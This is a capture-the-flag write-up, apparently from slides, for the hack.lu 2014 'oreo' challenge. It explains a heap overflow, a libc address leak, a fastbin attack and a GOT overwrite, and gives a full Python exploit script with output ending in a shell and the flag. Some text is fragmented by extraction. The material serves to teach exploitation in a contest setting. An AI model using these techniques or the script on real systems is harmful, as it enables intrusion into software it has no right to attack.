oreo - hack.lu ctf 2014

OREOHack.lu CTF 2014 - Exploiting 400 points

you0708@YOKARO-MON

The Original Rifle Company has the most finest rifles and revolvers in whole Rodeo City! However their buildings are pretty secure, so your only chance to get into their offices is by hacking through the Original Rifle Ecommerce Online (OREO) System and steal all those pretty weapons from the inside! Makes sense right? Good luck!

nc wildwildweb.fluxfingers.net 1414

Welcome to the OREO Original Rifle Ecommerce Online System!

,______________________________________ |_________________,----------._ [____] -,__ __....-----===== (_(||||||||||||)___________/ | `----------' OREO [ ))"-, | "" `, _,--....___ | `/ """"

What would you like to do?

1. Add new rifle2. Show added rifles3. Order selected rifles4. Leave a Message with your Order5. Show current stats6. Exit!Action: 1Rifle name: hogehogeRifle description: sample rifleAction: 2Rifle to be ordered:===================================Name: hogehogeDescription: sample rifle===================================Action:

Analysis

Surface Analysis

• file

• ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, stripped

• checksec

• CANARY : ENABLED

• FORTIFY : disabled

• NX : ENABLED

• PIE : disabled

• RELRO : disabled

Dynamic Analysis

• We can order rifles

1. Select rifles you want to order

• Need to specify rifle name & description

2. Submit an order for selected rifles

• Can leave a message

Static Analysis

• Reverse engineering using IDA

• Data structure of the rifle

Static Analysis

Static Analysis

• aa_rifle (Size = 0x38)

Offset Size Name

0x00 0x19 description

0x19 0x1B name

0x34 4 last

Fastbins

Reference: Heap Chunk

• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200

http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200

Understanding Rifle Management using GDB• After adding 2 rifles

• After order size + flag, fd, bk

“A” “a”

“b”“B”

It can be found from 0x0804A288 that stores address of last rifle

• After adding 2 riflesHeap

Chunk 2

Chunk 1

Understanding Rifle Management

Rifle 2

0x00000041 (size + flag)(prev size)

Rifle 1description

name

0


description

name

address of Rifle 1

• After orderHeap

Chunk 2

Chunk 1

Understanding Rifle Management



0x00000000 (fd)0x00000000 (bk)

address of Chunk 2 (fd)0x00000000 (bk)

Vulnerability

• Add command

1. Alloc 0x38 bytes heap (new rifle)

2. Connect to previous rifle

3. Input rifle’s name (max 0x38 bytes)

4. Input rifle’s description (max 0x38 bytes)

5. Add rifle counter

Vulnerability

• You can do buffer-overflow as below

Rifle

description

name

last

“A” * 0x38

Vulnerability

• Or

Rifle

description

name

last“A” * 0x38

Exploitation

Memory Leakage

• Overwrite last rifle addressHeap

Chunk 1 Rifle 1

description

name

0


Target data

You can read target data as rifle’s description using show command

“A” * 0x1B+ address of target data

Fastbins Unlink Attack

• Breaking fastbins chainHeap

FreedChunk 2

Reallocated Chunk 1



address of Chunk 1bk

Rifle 3description

name

0“A” * 0x1F

+ 0+ 0

+ 0x41+ address of target memory

Target memory

It used as a heap chunk after re-

allocating Chunk 2

Add a rifle after free 2 rifles

Reference: Fastbins Unlink Attack• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200

To avoid size check failure, you have to put a correct value into “size”

(In this case, the value must be 0x41)

http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200

Making Fake Freed Chunk

• You have to find the area that can be set to 0x41 when re-allocation

Chunk

0x41 (size + flag)

(prev size)

fd

bk

You can use 0x804A2A0 as a freed chunk because

rifle_counter can be set 0x41

Exploitation Process

1. Leak address of ibc functions

2. Calc address of “system”

3. Add rifles until rifle counter is 0x3F

4. Order rifles (free fastbins)

5. Breaking fastbins chain by adding a rifle

6. Allocate 0x804A2A0 as a heap chunk by adding a rifle

7. Overwrite GOT by leaving message

8. Get shell


2. Calc address of “system”

• See http://pastebin.com/9vq38BYH

http://pastebin.com/9vq38BYH


3. Add rifles until rifle counter is 0x3F

4. Order rifles (Free fastbins)

while rifle_count < 0x3e: cmd_add("A"*27+p(0), "B") cmd_add("A", "B") cmd_order()

To avoid to create many fast chunks,the “last” should be 0x00000000


6. Allocate 0x804A2A0 as a heap chunk by adding a rifle

• Before allocation, rifle counter will be 0x41 • Its description must be addr of strlen@got

Address Before After0x804A2A0 orderd_counter prev_size 0x000000000x804A2A4 rifle_counter size + flag 0x00000041

0x804A2A8 lpMsg description address of strlen@got

0x804a2c1 msg_buf + 1 name “foobar"

0x804a2dc msg_buf + 0x1C last Unknown

strlen@got is will be call the program after adding a rifle/leaving a message


7. Overwrite strlen@got by leaving a message

• Now lpMsg points to strlen@got

• Message should be p(libc_system) + “;sh\x00"

• “;sh\x00" will be used in next step


8. Get shell

• Overwrote strlen will be called after adding the rifle

• Its argument is the message:p(libc_system) + “;sh\x00”

• It means the program will callsystem(“\x??\x??\x??\x??;sh”)

oreo.pys, f = sock("wildwildweb.fluxfingers.net", 1414)got_malloc = 0x0804A244got_strlen = 0x0804A250p_order_msg = 0x0804A2A8rifle_count = 0ready_action()

cmd_add("A"*27+p(got_malloc-0x19), "B"*25)libc_malloc = u(cmd_show()[1][0][:4])print("[*] got libc malloc: 0x%08x" % libc_malloc)libc_system = libc_malloc - 0x0007d950 + 0x00042af0print("[*] got libc system: 0x%08x" % libc_system)

while rifle_count < 0x3e: cmd_add("A"*27+p(0), "B")cmd_add("A", "B")cmd_order()

cmd_add("A"*27+p(0)+p(0)+p(0x41)+p(p_order_msg-8), "B")cmd_add("A", "B")cmd_add("A", p(got_strlen))cmd_msg(p(libc_system) + ";sh\x00", noread=True)print("[*] got shell")shell(s)

$ python oreo.py[*] rifle count: 0x01[*] got libc malloc: 0xf76a2950[*] got libc system: 0xf7667af0[*] rifle count: 0x02[*] rifle count: 0x03

(snip.)

[*] rifle count: 0x3f[*] ordered[*] rifle count: 0x40[*] rifle count: 0x41[*] rifle count: 0x42[*] got shelllsfl4g oreocat fl4gflag{FASTBINS_ARE_NICE_ARENT_THEY}

Thank you!

oreo - hack.lu ctf 2014

Engineering